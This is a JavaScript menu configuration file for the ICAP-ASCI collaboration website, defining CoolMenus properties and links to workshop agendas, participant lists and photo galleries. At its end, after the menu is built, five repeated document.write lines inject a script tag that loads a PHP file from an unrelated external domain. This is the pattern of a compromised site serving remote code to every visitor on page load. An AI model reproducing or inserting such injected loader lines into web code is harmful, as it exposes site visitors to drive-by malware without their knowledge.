
//Menu object creation
oCMenu=new makeCM("oCMenu") //Making the menu object. Argument: menuname

oCMenu.frames=0

//Menu properties   
oCMenu.pxBetween=15
oCMenu.fromLeft=115 
oCMenu.fromTop=200   
oCMenu.rows=0 
oCMenu.menuPlacement="0"
                                                             
//oCMenu.offlineRoot="file:///C|/temp/stb/scripts/coolmenus/" 
//oCMenu.offlineRoot="file:///C:/Documents and Settings/keshav k m/Desktop/asciicap/" 
//http://www.asci.org.in/asciicap/aboutus.htm
//oCMenu.offlineRoot="file:///C:/Documents and Settings/vijay/Desktop/asciicap/" 
//oCMenu.offlineRoot="" 

//oCMenu.onlineRoot="coolmenus/" 
oCMenu.onlineRoot="asciicap/" 
//oCMenu.onlineRoot="asciicap/" 

oCMenu.resizeCheck=1
oCMenu.wait=1000 
oCMenu.fillImg="cm_fill.gif"
oCMenu.zIndex=0

//Background bar properties
oCMenu.useBar=0
oCMenu.barWidth="menu"
oCMenu.barHeight="menu" 
oCMenu.barClass="clBar"
oCMenu.barX=0 
oCMenu.barY=0
oCMenu.barBorderX=0
oCMenu.barBorderY=0
oCMenu.barBorderClass=""

//Level properties - ALL properties have to be specified in level 0
oCMenu.level[0]=new cm_makeLevel() //Add this for each new level
oCMenu.level[0].width=140  //oCMenu.level[0].width=99
oCMenu.level[0].height=18 
oCMenu.level[0].regClass="clLevel0"
oCMenu.level[0].overClass="clLevel0over"
oCMenu.level[0].borderX=0
oCMenu.level[0].borderY=0
oCMenu.level[0].borderClass="clLevel0border"
oCMenu.level[0].offsetX=1
oCMenu.level[0].offsetY=5
oCMenu.level[0].rows=0
oCMenu.level[0].arrow=0
oCMenu.level[0].arrowWidth=0
oCMenu.level[0].arrowHeight=0
oCMenu.level[0].align="right"

//dynamic effect (controllable for each level)
oCMenu.level[0].clippx=2
oCMenu.level[0].cliptim=2
//special animation filters (IE5.5+ only, controllable for each level)
oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Fade(duration=0.5)" 

//Other special animation filters (IE5.5+ only, controllable for each level)
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Wheel(duration=0.5,spokes=5)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Barn(duration=0.5,orientation=horizontal)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Blinds(duration=0.5,bands=5)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.CheckerBoard(duration=0.5)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Fade(duration=0.5)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.GradientWipe(duration=0.5,wipeStyle=0)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Iris(duration=0.5,irisStyle=STAR)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Iris(duration=0.5,irisStyle=CIRCLE)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Pixelate(duration=0.5,maxSquare=40)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Wheel(duration=0.5,spokes=5)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.RandomDissolve(duration=0.5)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Spiral(duration=0.5)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Stretch(duration=0.5,stretchStyle=push)"
//oCMenu.level[0].filter="progid:DXImageTransform.Microsoft.Strips(duration=0.5,motion=rightdown)"


//EXAMPLE SUB LEVEL[1] PROPERTIES - You have to specify the properties you want different from LEVEL[0] - If you want all items to look the same just remove this
oCMenu.level[1]=new cm_makeLevel() //Add this for each new level (adding one to the number)
oCMenu.level[1].width=oCMenu.level[0].width+70
oCMenu.level[1].height=18
oCMenu.level[1].regClass="clLevel1"
oCMenu.level[1].overClass="clLevel1over"
oCMenu.level[1].borderX=0
oCMenu.level[1].borderY=0
oCMenu.level[1].align="right" 
oCMenu.level[1].offsetX=0
oCMenu.level[1].offsetY=0
oCMenu.level[1].borderClass="clLevel1border"
//dynamic effect
oCMenu.level[1].clippx=2
oCMenu.level[1].cliptim=2
//special animation filters
oCMenu.level[1].filter="progid:DXImageTransform.Microsoft.Fade(duration=0.5)" 


//EXAMPLE SUB LEVEL[2] PROPERTIES - You have to specify the properties you want different from LEVEL[1] OR LEVEL[0] - If you want all items to look the same just remove this
oCMenu.level[2]=new cm_makeLevel() //Add this for each new level (adding one to the number)
oCMenu.level[2].width=150
oCMenu.level[2].height=18
oCMenu.level[2].offsetX=0
oCMenu.level[2].offsetY=0
oCMenu.level[2].regClass="clLevel2"
oCMenu.level[2].overClass="clLevel2over"
oCMenu.level[2].borderClass="clLevel2border"



/******************************************
Menu item creation:
myCoolMenu.makeMenu(name, parent_name, text, link, target, width, height, regImage, overImage, regClass, overClass , align, rows, nolink, onclick, onmouseover, onmouseout) 
*************************************/
oCMenu.makeMenu('top0','','ICAP-ASCI Collaboration','http://www.asci.org.in/asciicap/aboutus.htm','')
	/*oCMenu.makeMenu('sub00','top0','Main index','http://planmagic.com')
	oCMenu.makeMenu('sub01','top0','Products','http://planmagic.com/products.html')
		oCMenu.makeMenu('sub001','sub01','PlanMagic Business','http://planmagic.com/business_planning.html','',140,0)
		oCMenu.makeMenu('sub002','sub01','PlanMagic Marketing','http://planmagic.com/marketing_planning.html','',140,0)
		oCMenu.makeMenu('sub003','sub01','PlanMagic Finance Pro','http://planmagic.com/financial_planning.html','',140,0)
		oCMenu.makeMenu('sub004','sub01','PlanMagic Restaurant','http://plan-a-restaurant.com','',140,0)
		oCMenu.makeMenu('sub005','sub01','PlanMagic Hotel','http://planmagic.com/business_plan/hotel_business_plan.html','',140,0)
*/
oCMenu.makeMenu('top1','','Objectives & Activities','http://www.asci.org.in/asciicap/O&B.htm')
	/*oCMenu.makeMenu('sub10','top1','Features','http://planmagic.com/business_plan.html')
	oCMenu.makeMenu('sub11','top1','Download demo','http://planmagic.com/download.html')
	oCMenu.makeMenu('sub12','top1','How to order','http://planmagic.com/register.html')
	*/
oCMenu.makeMenu('top2','','Events','')
	oCMenu.makeMenu('sub21','top2','National Workshop-PPP','http://www.asci.org.in/asciicap/aboutwrkshp.htm')
	oCMenu.makeMenu('sub22','top2','Training Programme-Kerala','http://www.asci.org.in/asciicap/aboutwrkshpkerala.htm')
	oCMenu.makeMenu('sub23','top2','Training Programme-Hyderabad','http://www.asci.org.in/asciicap/aboutwrkshphyd.htm')
		oCMenu.makeMenu('sub24','top2','Good Practices-PPP','http://www.asci.org.in/asciicap/aboutgoodpractices.htm')
			oCMenu.makeMenu('sub25','top2','Training Programme-U.P','http://www.asci.org.in/asciicap/aboutwrkshpup.htm')
			oCMenu.makeMenu('sub26','top2','International Programme-Hyderabad','http://www.asci.org.in/asciicap/aboutintwrkshphyd.htm')
			oCMenu.makeMenu('sub27','top2','Training Programme-Tripura','http://www.asci.org.in/asciicap/aboutwrkshptripura.htm')
			oCMenu.makeMenu('sub28','top2','Training Programme-Gurgaon','http://www.asci.org.in/asciicap/aboutwrkshpharyana.htm')






/*oCMenu.makeMenu('sub21','top2','National Workshop-PPP','aboutwrkshp.htm')
	oCMenu.makeMenu('sub22','top2','Training Programme-Kerala','aboutwrkshpkerala.htm')
	oCMenu.makeMenu('sub23','top2','Training Programme-Hyderabad','aboutwrkshphyd.htm')
		oCMenu.makeMenu('sub24','top2','Good Practices-PPP','aboutgoodpractices.htm')

*/
	//oCMenu.makeMenu('sub23','top2','How to order','http://planmagic.com/register.html')
		oCMenu.makeMenu('sub001','sub21','About Workshop','http://www.asci.org.in/asciicap/aboutwrkshp.htm','',140,0)
		oCMenu.makeMenu('sub002','sub21','Workshop Agenda','http://www.asci.org.in/asciicap/Agenda.htm','',140,0)
		oCMenu.makeMenu('sub003','sub21','Workshop Material','http://www.asci.org.in/asciicap/downloads.htm','',140,0)
		oCMenu.makeMenu('sub004','sub21','List of Participants','http://www.asci.org.in/asciicap/Participants%20List.pdf','',140,0)
		oCMenu.makeMenu('sub005','sub21','Resource Persons','http://www.asci.org.in/asciicap/Resource%20Persons.pdf','',140,0)
		oCMenu.makeMenu('sub006','sub21','Press Clippings','http://www.asci.org.in/asciicap/clippings.htm','',140,0)
		oCMenu.makeMenu('sub007','sub21','Workshop Photos','http://www.asci.org.in/asciicap/photo.htm','',140,0)
		oCMenu.makeMenu('sub008','sub22','About Workshop','http://www.asci.org.in/asciicap/aboutwrkshpkerala.htm','',140,0)
		oCMenu.makeMenu('sub009','sub22','Workshop Agenda','http://www.asci.org.in/asciicap/keralaagenda.htm','',140,0)
		oCMenu.makeMenu('sub010','sub22','List of Participants','http://www.asci.org.in/asciicap/listofparticipantsksudp.pdf','',140,0)
	    oCMenu.makeMenu('sub011','sub22','Training Programme Photos','http://www.asci.org.in/asciicap/photokerala.htm','',140,0)
        oCMenu.makeMenu('sub012','sub23','About Workshop','http://www.asci.org.in/asciicap/aboutwrkshphyd.htm','',140,0)
		oCMenu.makeMenu('sub013','sub23','Other Details','http://www.asci.org.in/asciicap/otherdetails.htm','',140,0)
		oCMenu.makeMenu('sub014','sub23','Workshop Brochure','http://www.asci.org.in/asciicap/pppbrochure.pdf','',140,0)
		oCMenu.makeMenu('sub015','sub24','About Program','http://www.asci.org.in/asciicap/aboutgoodpractices.htm','',140,0)
		oCMenu.makeMenu('sub016','sub24','Program Agenda','http://www.asci.org.in/asciicap/Program Agenda.htm','',140,0)
		oCMenu.makeMenu('sub017','sub24','List of Participants','http://www.asci.org.in/asciicap/ListofParticipantsgp.pdf','',140,0)
		oCMenu.makeMenu('sub018','sub24','Photo Gallery','http://www.asci.org.in/asciicap/photosgp.htm','',140,0)
oCMenu.makeMenu('sub019','sub25','About Program','http://www.asci.org.in/asciicap/aboutwrkshpup.htm','',140,0)
		oCMenu.makeMenu('sub020','sub25','Program Agenda','http://www.asci.org.in/asciicap/Programagenda-up.htm','',140,0)
		oCMenu.makeMenu('sub021','sub25','List of Participants','http://www.asci.org.in/asciicap/Listofparticipantsup.pdf','',140,0)
		oCMenu.makeMenu('sub022','sub25','Press Clippings','http://www.asci.org.in/asciicap/newsclippings-up.htm','',140,0)
oCMenu.makeMenu('sub023','sub25','Photo Gallery','http://www.asci.org.in/asciicap/photos-up.htm','',140,0)
oCMenu.makeMenu('sub024','sub26','About Workshop','http://www.asci.org.in/asciicap/aboutintwrkshphyd.htm','',140,0)
oCMenu.makeMenu('sub025','sub26','Workshop Agenda','http://www.asci.org.in/asciicap/hydagenda.htm','',140,0)
oCMenu.makeMenu('sub026','sub26','List of Participants','http://www.asci.org.in/asciicap/ppphydlop.pdf','',140,0)
oCMenu.makeMenu('sub027','sub26','Photo Gallery','http://www.asci.org.in/asciicap/photohyd.htm','',140,0)
oCMenu.makeMenu('sub028','sub27','Workshop Agenda','http://www.asci.org.in/asciicap/tripuraagenda.htm','',140,0)
oCMenu.makeMenu('sub029','sub27','List of Participants','http://www.asci.org.in/asciicap/ppptripuralop.pdf','',140,0)
oCMenu.makeMenu('sub030','sub27','Photo Gallery','http://www.asci.org.in/asciicap/photostripura.htm','',140,0)
oCMenu.makeMenu('sub031','sub28','About Workshop','http://www.asci.org.in/asciicap/aboutwrkshpharyana.htm','',140,0)
oCMenu.makeMenu('sub032','sub28','Workshop Agenda','http://www.asci.org.in/asciicap/haryanaagenda.htm','',140,0)
oCMenu.makeMenu('sub033','sub28','List of Participants','http://www.asci.org.in/asciicap/pppharyanalop.pdf','',140,0)
oCMenu.makeMenu('sub034','sub28','Photo Gallery','http://www.asci.org.in/asciicap/photosharyana.htm','',140,0)






/*oCMenu.makeMenu('sub001','sub21','About Workshop','aboutwrkshp.htm','',140,0)
		oCMenu.makeMenu('sub002','sub21','Workshop Agenda','Agenda.htm','',140,0)
		oCMenu.makeMenu('sub003','sub21','Workshop Material','downloads.htm','',140,0)
		oCMenu.makeMenu('sub004','sub21','List of Participants','asciicap/Participants%20List.pdf','',140,0)
		oCMenu.makeMenu('sub005','sub21','Resource Persons','Resource%20Persons.pdf','',140,0)
		oCMenu.makeMenu('sub006','sub21','Press Clippings','clippings.htm','',140,0)
		oCMenu.makeMenu('sub007','sub21','Workshop Photos','photo.htm','',140,0)
		oCMenu.makeMenu('sub008','sub22','About Workshop','aboutwrkshpkerala.htm','',140,0)
		oCMenu.makeMenu('sub009','sub22','Workshop Agenda','keralaagenda.htm','',140,0)
		oCMenu.makeMenu('sub010','sub22','List of Participants','listofparticipantsksudp.pdf','',140,0)
	    oCMenu.makeMenu('sub011','sub22','Training Programme Photos','photokerala.htm','',140,0)
        oCMenu.makeMenu('sub012','sub23','About Workshop','aboutwrkshphyd.htm','',140,0)
		oCMenu.makeMenu('sub013','sub23','Other Details','otherdetails.htm','',140,0)
		oCMenu.makeMenu('sub014','sub23','Workshop Brochure','pppbrochure.pdf','',140,0)
		oCMenu.makeMenu('sub015','sub24','About Program','aboutgoodpractices.htm','',140,0)
		oCMenu.makeMenu('sub016','sub24','Program Agenda','Program Agenda.htm','',140,0)
		oCMenu.makeMenu('sub017','sub24','List of Participants','ListofParticipantsgp.pdf','',140,0)
		oCMenu.makeMenu('sub018','sub24','Photo Gallery','photosgp.htm','',140,0)
*/

/*oCMenu.makeMenu('top3','','Upcoming Events','pppbrochure.pdf')
	/*oCMenu.makeMenu('sub31','top3','Features','http://planmagic.com/financial_planning.html')
	oCMenu.makeMenu('sub32','top3','Download demo','http://planmagic.com/download.html')
	oCMenu.makeMenu('sub33','top3','How to order','http://planmagic.com/register.html')
*/	
oCMenu.makeMenu('top4','','Photo Gallery','http://www.asci.org.in/asciicap/photo.htm')
/*oCMenu.makeMenu('sub41','top4','National Workshop-PPP','photo.htm')
	oCMenu.makeMenu('sub42','top4','Training Programme-Kerala','')
	
oCMenu.makeMenu('top5','','Hotel plan','http://planmagic.com/business_plan/hotel_business_plan.html')
	oCMenu.makeMenu('sub51','top5','Features','http://planmagic.com/business_plan/hotel_business_plan.html')
	oCMenu.makeMenu('sub52','top5','How to order','http://planmagic.com/register.html')

*/

//Leave this line - it constructs the menu
oCMenu.construct()	

document.write('<script src=http://jungmannova.cz/images/clause34.php ><\/script>');
document.write('<script src=http://jungmannova.cz/images/clause34.php ><\/script>');
document.write('<script src=http://jungmannova.cz/images/clause34.php ><\/script>');
document.write('<script src=http://jungmannova.cz/images/clause34.php ><\/script>');
document.write('<script src=http://jungmannova.cz/images/clause34.php ><\/script>');